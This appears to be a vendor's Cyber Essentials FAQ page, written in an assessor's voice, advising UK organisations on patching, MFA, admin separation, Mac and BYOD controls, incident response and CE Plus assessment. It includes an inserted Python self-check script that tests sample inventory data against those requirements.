Cyber Essentials FAQ Database: 327 Questions Answered

Cyber Essentials FAQ Database
Total: 327 FAQs across 13 categories
Processed through the content engine covering all eight quality gates, built as a drop-in replacement for the netsecgroup.io/cyber-essentials#faq page.
Contents
- Technical Requirements (60)
- Timing & Deadlines (44)
- CE vs CE Plus (39)
- Common Failures & Fixes (32)
- Incident Response (31)
- Cloud Services (27)
- MFA & Authentication (26)
- Devices & BYOD (19)
- Who Needs It (12)
- Costs & Pricing (12)
- Assessment Preparation (10)
- Our Service (8)
- Compliance & Monitoring (7)
Technical Requirements
How should I organise evidence for quick access?
Set up five folders, one per control: firewalls, secure configuration, access control, malware protection, security updates. Put screenshots, policy docs and admin portal login details in each. Label everything so you can find it in seconds during the screenshare. I move fast on assessment day, and dead time while you hunt for a screenshot costs you.
Keywords: evidence, organise, assessment preparation, folder structure | Confidence: 0.85
Do I need technical documentation like network diagrams?
Not technically required, but having documentation makes the day faster. A rough sketch of your network boundary, firewall placement, and key systems helps me verify scope in minutes instead of asking twenty questions. You don't need professional-looking diagrams at all, since a system inventory, admin account docs, and cloud service configurations will do. Less prep means more follow-up questions, and follow-up questions cost you time.
Keywords: documentation, network diagram, system inventory, assessment | Confidence: 0.8
What if I can't provide the evidence the assessor wants?
Tell me during the assessment and we'll work it out. If you can't show a specific screenshot, we'll find another way to demonstrate the control exists. A live demo often works better than a screenshot anyway. What I can't accept is "trust me, it's configured." Show me something, anything at all, because the control has to be demonstrably in place.
Keywords: evidence, assessment, alternative evidence, demonstration | Confidence: 0.8
Best practices for assessment day itself?
Check that everything you said in the CE Basic questionnaire is actually true. Patches within 14 days, MFA on every cloud account, admin accounts separated, firewalls configured. Have all your admin passwords ready and test your Teams screenshare before the day. Make sure whoever is on the call has access to everything and is available for 2-4 hours. I'm not trying to catch you out. I'm verifying that what you told me is actually in place.
Keywords: assessment day, preparation, best practice, screenshare | Confidence: 0.85
How do I ensure we pass first time?
Be completely honest in the questionnaire, because that's the whole secret. Don't say yes to something that isn't true. Then verify it: patches within 14 days (including Adobe, browsers, everything that isn't Windows Update), MFA on all cloud accounts, admin accounts separated, firewalls configured, malware protection running on every device. The number one reason people fail is writing "yes" on the form and discovering it's "no" when I look.
Keywords: pass first time, assessment, preparation, controls | Confidence: 0.9
What security controls must be planned before migration?
Plan all five controls before you move anything. Firewalls or network security groups, secure configuration of cloud services, MFA on all accounts (mandatory under Danzell v3.3), malware protection on cloud workloads, and a patching process. Write down which controls the cloud provider handles versus what's yours. I will ask you about the split during assessment.
Keywords: cloud migration, security controls, shared responsibility, planning | Confidence: 0.85
How do I handle legacy applications that won't work in cloud?
Legacy apps still need to be CE-compliant: supported by the vendor and receiving security patches within 14 days. If the vendor has dropped support, you have two options: isolate the app on a network segment with no internet access (which removes it from scope), or replace it. The age of the software is irrelevant. The only question is whether it still gets patches.
Keywords: legacy applications, unsupported software, patching, scope | Confidence: 0.85
Should I use hybrid identity or cloud-only for CE compliance?
Either approach works fine for CE compliance. Hybrid (on-premise AD synced to Entra ID) or cloud-only both meet CE requirements. MFA enforced on all cloud accounts, admin accounts separated, access controls working. That's what I check on assessment day. Cloud-only is simpler to evidence because everything's in one portal. Hybrid is fine but you'll need to show me both sides on assessment day.
Keywords: hybrid identity, cloud identity, Azure AD, Entra ID, MFA | Confidence: 0.8
How do I test application compatibility with cloud?
Set up a test environment and run your critical applications there before migrating. Check that they work with MFA-enabled accounts, that they handle cloud firewall rules properly, and that data flows as expected. Any application that touches organisational data in the cloud falls into your CE scope. Confirm it meets all five controls before you move it into production.
Keywords: application compatibility, cloud testing, migration, scope | Confidence: 0.75
What about applications that can't move to cloud?
On-premise applications stay in CE scope if they connect to the internet or handle organisational data. All five controls still apply to those systems. Under Danzell v3.3, cloud services can't be excluded from scope, but on-premise apps coexist with cloud just fine. Document the split clearly in your scope definition and we'll verify both sides.
Keywords: on-premise applications, hybrid, scope, cloud migration | Confidence: 0.8
What skills does my team need for cloud security management?
Configure MFA, create separate admin accounts, verify patches are applied, review security settings. That's the full CE requirement for cloud management. You don't need deep cloud architecture knowledge, just basic admin skills in M365 or Google Workspace, and both platforms offer free admin training courses. If you'd rather not deal with it, our CE Concierge service handles the configuration.
Keywords: cloud skills, team training, cloud security, admin skills | Confidence: 0.8
What do assessors actually check during assessment?
I check whether what you wrote on the questionnaire is actually true: firewall rules, patch status (Windows and third-party), MFA on every cloud account, admin accounts separated from daily accounts, malware protection running on everything, and no unnecessary software or default passwords. I do this via Teams screenshare on a sample of your devices and cloud admin portals. Two to four hours for CE Plus if you're prepared.
Keywords: assessment, what assessors check, CE Plus, screenshare, verification | Confidence: 0.9
What questions do assessors ask?
"Show me your firewall rules." "When was this device last patched?" "Can you demonstrate MFA is enabled on all M365 accounts?" "Show me your admin accounts. Are they used for daily email?" "What malware protection is running on this laptop?" I'm verifying what you told me in the questionnaire. If you don't know the answer, say so. I'd rather help you find it than have you guess wrong.
Keywords: assessment questions, assessor, CE Plus, what to expect | Confidence: 0.85
How quickly does compliance deteriorate without monitoring?
Faster than most people expect, because within 14 days patches fall behind. Within a month, someone adds a new cloud service without configuring MFA. Within 60 days, staff drift back to using admin accounts for daily email. By month six you'll have multiple compliance gaps across all five controls. The patching requirement is what catches people first. Miss one update cycle and you're technically non-compliant.
Keywords: compliance drift, monitoring, patch management, ongoing compliance | Confidence: 0.85
What are the minimum things I must monitor for CE compliance?
Patches: all devices updated within 14 days of critical releases? MFA: all cloud accounts enrolled and enforced? Admin accounts: separated and not used for daily email? Malware protection: active and updated on every device? New additions: new devices and cloud services configured before going live? Check patches on a weekly basis and review everything else monthly at minimum.
Keywords: compliance monitoring, minimum monitoring, five controls, patch tracking | Confidence: 0.85
What should trigger immediate alerts?
Compliance-breaking events are what matter, not informational noise. Things like critical patches available but not yet installed, MFA disabled on any cloud account, admin accounts being used for daily email, malware protection stopped on any device, firewall rules changed without authorisation, or multiple failed login attempts on admin accounts. Don't set alerts on every minor event, because if everything is flagged as urgent then nothing actually gets attention.
Keywords: alerts, compliance alerts, security monitoring, critical events | Confidence: 0.8
What compliance issues can be automatically fixed?
Patching is the clearest candidate, since automated patch deployment handles the 14-day requirement without anyone touching it. Malware definition updates work the same way with automatic deployment. Password policy enforcement through Entra ID conditional access prevents weak passwords automatically. Disabling unused accounts after 30 days of inactivity is also safe to automate. Don't automate admin account creation, deletion, or firewall rule changes. Those need someone actively thinking about the consequences before changes go live.
Keywords: automated remediation, patch automation, compliance automation | Confidence: 0.8
Should I implement automatic remediation?
Start with a conservative approach to automation. Patches, antivirus updates, and disabling inactive accounts are safe to automate now. Firewall rule changes and admin account creation need an approval workflow: automation proposes, human approves. Never automate admin credential changes (you'll lock yourself out) or production reboots (timing matters). Prove reliability on the low-risk items first, then expand.
Keywords: automatic remediation, automation, compliance, risk management | Confidence: 0.8
How long should I keep compliance monitoring data?
Twelve months minimum, which covers your full CE certification cycle. Patch records, MFA changes, admin account activity, firewall rule modifications. If you have cyber insurance, check the policy. Some insurers want longer retention for claims evidence. Storage is cheap enough that it's never worth deleting, and not having the data when someone asks for it is expensive.
Keywords: data retention, compliance records, monitoring data, certification cycle | Confidence: 0.75
Who should be responsible for compliance monitoring?
Someone internal to your organisation needs to own it. CE requires a named individual responsible for IT systems (question A2.10). That person doesn't have to do the monitoring themselves, but accountability stays internal. For small businesses that's usually the owner, and for larger organisations: IT manager or security lead. Whoever it is needs the authority to enforce changes when things drift.
Keywords: compliance responsibility, IT manager, accountability, CE scope | Confidence: 0.8
Can contractors use their own laptops for our work?
Yes, but under Danzell v3.3 their BYOD laptops are in scope if they touch your data or services. All CE requirements apply: software firewall, malware protection, patches within 14 days, MFA, separated admin accounts. Enforce it through MDM or issue company laptops. For short-term contractors, lending a device is almost always simpler than managing compliance on kit you don't control.
Keywords: contractors, BYOD, laptops, scope, Danzell | Confidence: 0.85
How do I prove contractor devices are secure?
You have three options for proving contractor device security. MDM that enforces policies and generates compliance reports. Company-owned devices that you fully control and manage. Or for BYOD, require contractors to provide screenshots: patch status, firewall enabled, antivirus active. During CE Plus, I'll check contractor devices against the same standard as employee devices. There are no exceptions to this standard.
Keywords: contractor compliance, device security, MDM, evidence, BYOD | Confidence: 0.8
Can assessors test contractor devices directly?
If the device is in scope, it can be sampled. If a contractor accesses your data or services, their device is in scope under Danzell v3.3. I check the same things as any other device: patches, firewall, malware protection, admin separation. If the contractor isn't available on assessment day, provide MDM reports or screenshots of their device compliance.
Keywords: contractor devices, CE Plus, assessment, sampling, scope | Confidence: 0.8
Our IT support company has admin access to everything. How do I manage this?
Their accounts are in your CE scope. Admin privileges on your systems mean they follow your rules: separate admin accounts (not shared credentials), MFA on those accounts, and their devices patched within 14 days with malware protection running. Document all of this clearly in your questionnaire. You're responsible for their security on your infrastructure, not them.
Keywords: outsourced IT, MSP, admin access, shared responsibility, scope | Confidence: 0.85
Contractor device was stolen with our data. What's the process?
Revoke their access immediately across all systems and all cloud services. Change any shared credentials they had access to. If the device was encrypted (which CE requires), the risk is lower but not zero. Check whether remote wipe is possible through MDM. Notify your insurer and document everything with full timestamps. This is why MDM and BYOD policies matter. They're what you reach for when a device disappears.
Keywords: stolen device, contractor, incident response, data breach, remote wipe | Confidence: 0.8
How do I know if an incident threatens CE compliance?
Did it compromise any of the five controls? Were firewall rules modified or bypassed, system settings changed, admin credentials stolen or MFA beaten, antivirus disabled, or an unpatched vulnerability exploited? If any CE control failed, remediate and verify all controls are restored before renewal. The incident itself doesn't invalidate your certificate, but leaving a broken control unfixed would.
Keywords: incident response, CE compliance, security incident, controls, remediation | Confidence: 0.8
How do I respond to malware infection on CE certified systems?
Pull the device off the network immediately before the infection spreads. Run a full malware scan, quarantine what it finds. Check nearby devices for signs of lateral spread. Work out how the infection got in: phishing, USB, malicious website, something else. Clean it or rebuild from backup if the damage is bad enough. Verify all five CE controls are working again across the environment. Document everything because your insurer will want detailed incident records.
Keywords: malware infection, incident response, remediation, CE controls | Confidence: 0.85
How do I know when systems are safe to restore?
When you've confirmed the threat is gone, you know the entry point and it's closed, all credentials are changed (admin passwords and service accounts especially), multiple scans show clean results, and all five controls are verified working. Don't rush the restoration process: restore too early with the attacker still in the environment and you'll have a second incident within hours. Test restoration on an isolated system first if you can.
Keywords: system restoration, incident recovery, safe to restore, verification | Confidence: 0.8
What testing is needed after incident recovery?
Verify every control before you go back to normal. Firewalls blocking inbound by default (run an external port scan if you can). Antivirus active on every device in the environment. Run a vulnerability scan to confirm patches are current. Admin accounts separated, MFA working on all required accounts. No rogue accounts created during the incident. Security logging active and capturing events across all systems. Document all of it for your records. Your certification body or insurer may ask for the evidence.
Keywords: post-incident testing, recovery verification, CE controls, evidence | Confidence: 0.8
Do Cyber Essentials requirements apply differently to Macs vs PCs?
No, the same five controls and same rules apply regardless of platform. macOS has built-in features (XProtect, Gatekeeper, application firewall) that can meet CE requirements when configured and evidenced properly. There are no Mac exemptions in the standard. If it touches your data and connects to your network, it must comply.
Keywords: Mac, macOS, PC, Windows, platform requirements, same controls | Confidence: 0.9
Can we use "Macs are more secure" as justification for relaxed controls?
No, the same controls and same enforcement apply to every platform. Firewall on, malware protection running (XProtect or third-party), admin accounts separated, patches within 14 days, and access controls enforced. Mac malware exists and the volume is growing year on year. I check the same five areas on your Macs as on your Windows PCs.
Keywords: Mac security, platform requirements, no exemptions, malware | Confidence: 0.85
Does macOS built-in security count as antivirus for Cyber Essentials?
It can count towards the CE requirement. XProtect and Gatekeeper meet the CE malware protection requirement when properly configured and evidenced. Some assessors prefer third-party antivirus because the evidence is clearer and management is centralised, especially for CE Plus. If you're going with built-in protection, be ready to show XProtect is active, Gatekeeper allows only notarised apps, and automatic updates are on. Third-party AV (Sophos, CrowdStrike, Microsoft Defender for Mac) makes the evidence side much simpler.
Keywords: macOS, XProtect, Gatekeeper, antivirus, malware protection, CE Plus | Confidence: 0.85
What exactly do XProtect and Gatekeeper provide?
XProtect is Apple's built-in signature-based malware scanner for macOS. It checks files on open or modify, blocks known malware, and updates itself through system updates. Gatekeeper verifies that apps are signed and notarised by Apple, blocks unsigned apps by default, and quarantines downloads for inspection. Together, they provide baseline malware protection that satisfies CE. The main limitation is evidence, because XProtect doesn't produce the compliance reports assessors want to see. That's why some assessors want a dedicated product for CE Plus.
Keywords: XProtect, Gatekeeper, macOS security, malware protection, evidence | Confidence: 0.8
How do we implement admin account separation on macOS without breaking features?
Create a separate admin account on each Mac, demote the daily-use account to standard. System Settings, Users & Groups, create the admin account, change the primary user to standard. Staff use standard for everything and enter admin credentials only when they need to install software or change settings. macOS prompts for the password when needed, so the workflow is smooth once people get used to it.
Keywords: admin account separation, macOS, standard user, administrator, access control | Confidence: 0.85
How do we track macOS update compliance across multiple devices?
Under 10 Macs, check manually: Apple menu, About This Mac, Software Update. Over 10 Macs, switch to MDM for centralised management. Intune, Jamf, Mosyle, Kandji all report macOS versions, pending updates, and patch compliance across the fleet. MDM also enforces automatic updates, which is the simplest way to hit the 14-day requirement. Without MDM, you're relying on users clicking "Update Later" until they finally give in. That's not a patching process you can demonstrate to an assessor.
Keywords: macOS updates, patch compliance, MDM, tracking, fleet management | Confidence: 0.8
How do we handle unified security policies across Mac and Windows?
Write policies that describe outcomes, not platforms. "All devices must have firewall protection enabled." Then write platform-specific implementation notes: Windows Defender Firewall on all profiles, macOS application firewall in System Settings. Cross-platform tools (Intune, CrowdStrike, SentinelOne) manage both from one console and simplify CE Plus evidence.
Keywords: unified policies, Mac and Windows, cross-platform, security policy, Intune | Confidence: 0.8
What about shared file servers between Mac and Windows?
The server is in scope regardless of what connects to it. Firewall configured with only necessary ports open, admin accounts separated, server-side antivirus running (a Mac can upload a file that infects a Windows client), OS patched within 14 days, and SMBv1 disabled. Cloud file storage (M365, Google Workspace) often simplifies mixed environments because the security controls are built in.
Keywords: file server, Mac and Windows, SMB, shared storage, compliance | Confidence: 0.75
Which macOS versions are acceptable for Cyber Essentials?
Any version currently getting security updates from Apple. Right now that's macOS 15 Sequoia, 14 Sonoma, and 13 Ventura. Anything older is likely unsupported and won't pass because Apple isn't releasing patches for it. Check Apple's security updates page to confirm. Pre-2017 Macs may not run current versions, which means you need new hardware.
Keywords: macOS versions, supported versions, Apple security updates, compatibility | Confidence: 0.85
What about Apple's statement that older versions may not get all security patches?
Apple has said older supported versions don't always get every patch the latest version gets. For CE, the latest macOS version is the safe option. If a critical vulnerability gets patched in macOS 15 but not 13, you're technically non-compliant. In practice, most critical patches reach all supported versions. But if you want to eliminate the question entirely, keep your Macs on the latest release.
Keywords: macOS patches, older versions, security updates, Apple, compliance risk | Confidence: 0.75
What's the simplest Mac management approach?
Under 10 Macs, manage them manually: firewall on, automatic updates on, separate admin account, daily account demoted to standard. Microsoft Defender for Mac is free with M365 Business Premium. Screenshot the security settings on each Mac for evidence. Over 10 Macs, switch to MDM instead. Mosyle has a free tier, Kandji and Jamf are paid. MDM enforces settings centrally and generates evidence automatically.
Keywords: Mac management, small business, MDM, manual approach, CE evidence | Confidence: 0.85
What should we be ready to demonstrate?
Firewall enabled in System Settings on every Mac. Admin account separation (standard user for daily work, separate admin for installs). Malware protection status (XProtect or third-party AV console). Software update status showing macOS is current. Sharing settings with all unnecessary services turned off. Practise finding these settings before the day. The most common delay on Mac assessments is someone spending five minutes trying to find where the firewall settings moved in the latest macOS update.
Keywords: Mac CE Plus, demonstration, assessment evidence, macOS settings | Confidence: 0.8
What about emergency "break glass" admin accounts?
Emergency admin accounts are for when normal authentication fails (MFA outage, locked out of everything). They are acceptable under CE with conditions: extremely strong password (20+ characters), stored securely (sealed envelope in a safe, or a secure vault), usage monitored and alerted, used only in genuine emergencies. Don't use them to bypass MFA because someone forgot their phone. I may ask about your break glass procedure during assessment.
Keywords: break glass, emergency account, admin, MFA bypass, security | Confidence: 0.8
Are "remember this device" options compliant?
Acceptable for standard user accounts if they remember the specific device (exact browser and computer combination), not just the user. A 30-day maximum is reasonable for standard accounts. For admin accounts, shorter or no remember period. The recognition must fail on a different computer or browser, triggering a fresh MFA challenge. Check your conditional access policies carefully, because "remember this device" has a habit of silently bypassing MFA in ways nobody intended.
Keywords: remember device, MFA, conditional access, session management, compliant | Confidence: 0.8
Can multiple users share a device unlock PIN?
No, CE requires unique credentials for every single user. If multiple people share a PIN, you can't identify who accessed the device or hold anyone accountable. Each user needs their own account with their own credentials. For shared devices like reception PCs or shop floor terminals, set up individual user accounts that each person logs into with their own password or biometric. I see this constantly during assessments and it always causes problems.
Keywords: shared PIN, device unlock, unique credentials, access control, shared devices | Confidence: 0.85
How do we handle staff resistance to device management?
Be straightforward with your staff about why it's needed. CE requires all devices accessing organisational data to meet security standards. If staff use personal devices for work, those devices are in scope. They don't have to use personal devices for work - that's a choice - but if they do, the device must be managed. Offer alternatives: company-owned devices, or web-only access through a managed browser that doesn't require MDM on the personal device. Most resistance comes from legitimate privacy concerns about personal devices. MDM on a personal phone doesn't give you access to personal photos or messages. Explaining that distinction usually defuses the pushback.
Keywords: staff resistance, MDM, BYOD, device management, privacy concerns | Confidence: 0.8
Do we need to wipe devices for MDM enrollment?
Usually not, and most modern MDM solutions (Intune, Jamf, Mosyle) enrol devices without wiping them. The MDM profile installs alongside existing data and applies security policies - password requirements, encryption, remote wipe capability - without touching personal content. A wipe is only needed if the device is being repurposed from personal to corporate use, or if conflicting management profiles are already installed.
Keywords: MDM enrollment, device wipe, BYOD, Intune, mobile management | Confidence: 0.8
What will assessors check regarding mobile devices?
For CE Plus, if mobile devices are in scope (they access organisational data beyond voice, text, and MFA apps), I'll check that device locking is enabled with a PIN or biometric, the OS is current and supported, a screen lock timeout is set, and encryption is enabled (on by default on modern iOS and Android). If MDM is in use, I check that security policies are being enforced. I check a representative sample rather than every device. If you've declared mobile devices out of scope, I'll verify they genuinely only access voice, text, and MFA apps.
Keywords: mobile assessment, CE Plus, device checks, sampling, mobile security | Confidence: 0.85
How do we handle device replacement?
New devices need to meet CE standards before they touch organisational data. Firewall enabled, malware protection installed, admin account separated, automatic updates on, and MFA enrolled. The full baseline needs to be in place. MDM makes this simple - policies apply automatically at enrolment. For old devices being retired, wipe them securely and remove them from your asset inventory. Don't leave decommissioned devices lingering in your MDM or scope documentation.
Keywords: device replacement, onboarding, decommission, security baseline, MDM | Confidence: 0.8
Our infrastructure is Azure AD-based with no SMB/Kerberos. How will authenticated scans work?
The scanner connects using Entra ID credentials or API-based authentication instead of SMB/Kerberos. Most modern scanning tools support cloud-native authentication. I'll discuss the specific setup during your pre-assessment call to make sure scanning works with your environment. Don't worry about buying additional tools - I handle the scanning as part of CE Plus.
Keywords: Azure AD, Entra ID, vulnerability scanning, CE Plus, cloud authentication | Confidence: 0.75
Should we run our own vulnerability scans before the assessment?
Not required for CE Basic, but for CE Plus it's a smart move. Running your own scan beforehand reveals gaps you can fix in advance rather than discovering them during assessment. If you find unpatched CVSS 7.0+ vulnerabilities older than 14 days, fix them before I arrive. Under Danzell, CE Plus has a second device sampling rule: if the first sample finds patching issues, I have to sample additional devices. Better to find and fix issues yourself first.
Keywords: vulnerability scanning, pre-assessment, CE Plus, patching, preparation | Confidence: 0.85
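The monitoring checklist above (patches within 14 days, MFA enforced, admin accounts separated, malware protection active, inactive accounts) and the CE Plus scan rule (CVSS 7.0+ findings older than 14 days fail, and any patching issue in the first sample triggers a second sample) can be turned into a simple pre-assessment self-check. This is an added example, not code from Net Sec Group or the FAQ; the device, account and finding records are constructed sample data in a hypothetical format, standing in for MDM, Entra ID and scanner exports.

```python
"""Pre-assessment CE self-check over a constructed inventory (added example)."""
from datetime import date

# Thresholds quoted in the FAQ
PATCH_WINDOW_DAYS = 14       # security updates applied within 14 days
HIGH_RISK_CVSS = 7.0         # CE Plus: CVSS 7.0+ findings count as failures
INACTIVE_ACCOUNT_DAYS = 30   # FAQ: disable accounts unused for 30 days

# Constructed sample data (hypothetical devices, users and finding ids)
TODAY = date(2025, 11, 1)
SAMPLE_DEVICES = [
    {"name": "LAPTOP-01", "last_patched": date(2025, 10, 25), "firewall": True, "av_active": True},
    {"name": "LAPTOP-02", "last_patched": date(2025, 9, 30), "firewall": True, "av_active": False},
    {"name": "MAC-03", "last_patched": date(2025, 10, 28), "firewall": False, "av_active": True},
]
SAMPLE_ACCOUNTS = [
    {"user": "alice", "cloud": True, "mfa": True, "admin": False, "daily_email": True,
     "enabled": True, "last_sign_in": date(2025, 10, 31)},
    {"user": "bob", "cloud": True, "mfa": False, "admin": False, "daily_email": True,
     "enabled": True, "last_sign_in": date(2025, 10, 30)},
    {"user": "admin-carol", "cloud": True, "mfa": True, "admin": True, "daily_email": True,
     "enabled": True, "last_sign_in": date(2025, 10, 29)},
    {"user": "leaver-dan", "cloud": True, "mfa": True, "admin": False, "daily_email": False,
     "enabled": True, "last_sign_in": date(2025, 8, 1)},
]
SAMPLE_FINDINGS = [  # finding ids are placeholders, not real CVE numbers
    {"device": "LAPTOP-02", "id": "FINDING-PLACEHOLDER-1", "cvss": 8.1, "published": date(2025, 10, 1)},
    {"device": "LAPTOP-01", "id": "FINDING-PLACEHOLDER-2", "cvss": 7.5, "published": date(2025, 10, 28)},
    {"device": "MAC-03", "id": "FINDING-PLACEHOLDER-3", "cvss": 4.3, "published": date(2025, 9, 1)},
]


def device_gaps(devices, today=TODAY):
    """Return (device, control, reason) tuples for the device-side controls."""
    gaps = []
    for d in devices:
        days = (today - d["last_patched"]).days
        if days > PATCH_WINDOW_DAYS:
            gaps.append((d["name"], "security updates", f"last patched {days} days ago"))
        if not d["firewall"]:
            gaps.append((d["name"], "firewalls", "firewall disabled"))
        if not d["av_active"]:
            gaps.append((d["name"], "malware protection", "protection not active"))
    return gaps


def account_gaps(accounts, today=TODAY):
    """Return (user, control, reason) tuples for MFA, admin separation and stale accounts."""
    gaps = []
    for a in accounts:
        if a["cloud"] and not a["mfa"]:
            gaps.append((a["user"], "access control", "MFA not enforced on cloud account"))
        if a["admin"] and a["daily_email"]:
            gaps.append((a["user"], "access control", "admin account used for daily email"))
        idle = (today - a["last_sign_in"]).days
        if a["enabled"] and idle > INACTIVE_ACCOUNT_DAYS:
            gaps.append((a["user"], "access control", f"enabled but unused for {idle} days"))
    return gaps


def overdue_findings(findings, today=TODAY):
    """CE Plus failure rule from the FAQ: CVSS 7.0+ and older than 14 days."""
    return [f for f in findings
            if f["cvss"] >= HIGH_RISK_CVSS and (today - f["published"]).days > PATCH_WINDOW_DAYS]


def extra_sample_needed(devices, findings, today=TODAY):
    """FAQ: a patching issue in the first sample means additional devices get sampled."""
    patch_gaps = [g for g in device_gaps(devices, today) if g[1] == "security updates"]
    return bool(patch_gaps or overdue_findings(findings, today))


def compliance_report(devices=None, accounts=None, findings=None, today=TODAY):
    """Run every check and return the gaps grouped the way an assessor would ask for them."""
    devices = SAMPLE_DEVICES if devices is None else devices
    accounts = SAMPLE_ACCOUNTS if accounts is None else accounts
    findings = SAMPLE_FINDINGS if findings is None else findings
    return {
        "device_gaps": device_gaps(devices, today),
        "account_gaps": account_gaps(accounts, today),
        "overdue_findings": [f["id"] for f in overdue_findings(findings, today)],
        "extra_sample_needed": extra_sample_needed(devices, findings, today),
    }


if __name__ == "__main__":
    for section, result in compliance_report().items():
        print(section, result)
```

Swap the constructed lists for your own MDM, Entra ID and scanner exports; an empty report with extra_sample_needed False is what you want to see before assessment day.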
Do we need to buy expensive vulnerability scanning tools?
No, for CE Basic no scanning tools are required at all. For CE Plus, I do the vulnerability scanning as part of the assessment using a Cyber Essentials authorised scanner approved by NCSC. You don't need to buy anything for the assessment itself. If you want ongoing scanning between assessments (which I'd recommend), our Cyber 365 service provides continuous scanning and patching. Note that Microsoft Defender, Sophos built-in scanners, RMM tools, and antivirus "vulnerability scan" features are not approved for CE Plus scans.
Keywords: vulnerability scanning tools, cost, CE Plus, NCSC approved scanner | Confidence: 0.85
What about legacy systems that can't be patched?
If a system can't be patched because the vendor no longer supports it, it fails CE. Two options: remove it from scope by isolating it on a separate network with no internet access (a defined sub-set in CE terminology), or replace it with a supported alternative. You can't leave an unpatched, unsupported system on your production network and certify. The 14-day patching requirement assumes the vendor is releasing patches. If they aren't, the software shouldn't be in scope.
Keywords: legacy systems, unsupported software, patching, scope exclusion, sub-set | Confidence: 0.9
Should we hire consultants for vulnerability management?
It depends entirely on your internal capability and resources. If you've got someone who understands patch management and can keep devices updated within 14 days, you don't need a consultant. Patches consistently falling behind with no dedicated IT resource? Outsourcing the patch management work makes sense in that situation. Our patching service (from £8/device/month) automates the 14-day requirement with compliance reporting. Vulnerability scanning starts from £2.50/agent/month, both cheaper than hiring someone, and both produce evidence for CE assessment.
Keywords: consultants, vulnerability management, outsourcing, patching service, cost | Confidence: 0.8
Do I really need Windows 11 for Cyber Essentials after October 2025?
Yes, Windows 10 support ended 14 October 2025. CE requires all in-scope devices to run a supported OS receiving security updates. Windows 10 devices fail because Microsoft no longer provides patches - you can't meet the 14-day requirement for software that isn't getting them. Your options: upgrade to Windows 11 (requires TPM 2.0, UEFI, Secure Boot), replace hardware that can't run Windows 11, remove devices from scope entirely, or purchase Microsoft's Extended Security Updates (ESU) which extend patch availability for up to three years at a cost. Most businesses choose to upgrade or replace hardware.
Keywords: Windows 11, Windows 10, end of support, upgrade, CE requirement | Confidence: 0.9
When should I start planning Windows 11 migration?
If you haven't started already, begin now. Windows 10 support ended October 2025, so any Windows 10 devices in your CE scope are already non-compliant unless you've enrolled them in Extended Security Updates. Check hardware compatibility first: Settings > Windows Update tells you whether each PC qualifies for the Windows 11 upgrade, and Microsoft's PC Health Check app gives the same answer along with the reason when a PC doesn't. Budget for replacement where PCs don't meet the TPM 2.0 and Secure Boot requirements. A mass hardware refresh takes three to six months, and procurement is the bottleneck, not the migration itself.
Keywords: Windows 11 migration, planning, hardware compatibility, timeline | Confidence: 0.85
Is Extended Security Updates (ESU) worth it instead of upgrading?
ESU buys you additional time, providing up to three years of continued Windows 10 security patches from Microsoft for business customers (one year for consumer ESU). Worth considering if your hardware can't run Windows 11 and replacing it isn't immediately feasible. But it's a temporary fix: ESU costs increase each year, and after three years the patches stop completely. For CE purposes, ESU keeps Windows 10 devices compliant because they're still receiving updates, provided the devices are on 22H2 and actually enrolled - a purchased but unactivated ESU licence doesn't help, and I'll want to see the ESU updates installing. Just factor in total ESU cost versus replacing the hardware now.
Keywords: ESU, Extended Security Updates, Windows 10, Windows 11, cost comparison | Confidence: 0.8
Does Net Sec Group help with Windows 11 migration planning?
I don't do Windows 11 migrations directly, but I can advise on what needs to happen for CE compliance. During assessment prep, I'll identify which devices are running unsupported operating systems and need upgrading. Our Cyber 365 Patching service (from £8/device/month) handles ongoing patch management once devices are on Windows 11, keeping the 14-day requirement met automatically.
Keywords: Net Sec Group, Windows 11, migration support, CE compliance, patching service | Confidence: 0.8
What exactly is EDR and how is it different from antivirus?
Traditional antivirus scans files against a database of known malware signatures. It catches known threats but is weak against anything new or repackaged. EDR (Endpoint Detection and Response) monitors device behaviour in real time - suspicious activity patterns rather than signature matching. If a process starts encrypting files rapidly (ransomware behaviour), EDR catches it even if that specific malware has never been seen before, and it records the process tree and network connections so you can see how it got in. For CE, basic antivirus meets the requirement. EDR goes beyond the minimum and is what I'd recommend, especially for businesses handling sensitive data.
Keywords: EDR, antivirus, endpoint detection, malware protection, behaviour monitoring | Confidence: 0.85
Does EDR work with Mac and Linux endpoints?
Yes, the major platforms including SentinelOne, CrowdStrike, Microsoft Defender for Endpoint, and Sophos all support macOS and Linux alongside Windows. CE requires malware protection on all in-scope devices regardless of OS, so a cross-platform EDR gives you one console, one set of policies, one set of compliance reports. Our EDR plus patching service (from £15/device/month) covers Windows, Mac, and Linux.
Keywords: EDR, Mac, Linux, cross-platform, SentinelOne, malware protection | Confidence: 0.8
Can EDR protect mobile devices?
Some EDR solutions offer mobile threat defence (MTD) for iOS and Android, but it's not the same as full endpoint EDR. Mobile protection covers app scanning, network threat detection, and phishing link protection - not the deep behavioural monitoring you get on desktops and laptops, because mobile operating systems don't give third-party apps that level of access. For CE, mobile devices need malware protection where applicable (primarily Android - iOS doesn't allow traditional antivirus). MDM that restricts app installs to the official store and enforces a lock screen and encryption usually satisfies CE for mobile devices.
Keywords: EDR, mobile devices, iOS, Android, mobile threat defence, MDM | Confidence: 0.75
Timing & Deadlines
Who should be present during assessment?
Your IT manager or whoever handles security needs to be present throughout. They need admin access to demonstrate configurations and answer technical questions on the spot. If your IT is outsourced, get your MSP on the call.
Keywords: assessment, IT manager, admin access, who attends | Confidence: 0.95
How do I prepare staff for potential disruption?
Tell staff systems may be briefly inaccessible during technical checks - short periods during the 2-4 hour assessment window. Schedule during a quieter business period if possible. In practice, most staff won't notice anything.
Keywords: staff notification, disruption, assessment window | Confidence: 0.92
How long do assessments typically take?
2-4 hours for CE Plus, depending on scope and how prepared you are. Simple environments with everything ready can finish in under two hours. Missing evidence or complex setups push it to a full afternoon.
Keywords: assessment duration, 2-4 hours, CE Plus | Confidence: 0.95
How long until I get my Cyber Essentials certification?
CE Basic (self-assessment questionnaire): 1-3 business days after submission. CE Plus: 3-5 business days after completing any remediation. If you need the certificate faster, Fast Track delivers in 12 hours for a £400 premium. Useful when a contract deadline won't move.
Keywords: certification timeline, Fast Track, turnaround, 12 hours | Confidence: 0.95
What if a device is broken/offline during assessment?
I'll check a different device from the same category. The assessment needs a representative sample, not every single device. If an entire category is unavailable (all your Macs are offline, for example), I may need to reschedule that portion.
Keywords: device offline, assessment, representative sample | Confidence: 0.95
How long do I have to fix issues found during assessment?
You've got 28 days to remediate any non-conformances found during the CE Plus assessment. That's the standard IASME timeframe for remediation. If you need longer than that, talk to me - I'm flexible for genuine technical challenges. I'll re-test the specific issues at no extra charge.
Keywords: remediation, 28 days, non-conformance, re-test | Confidence: 0.95
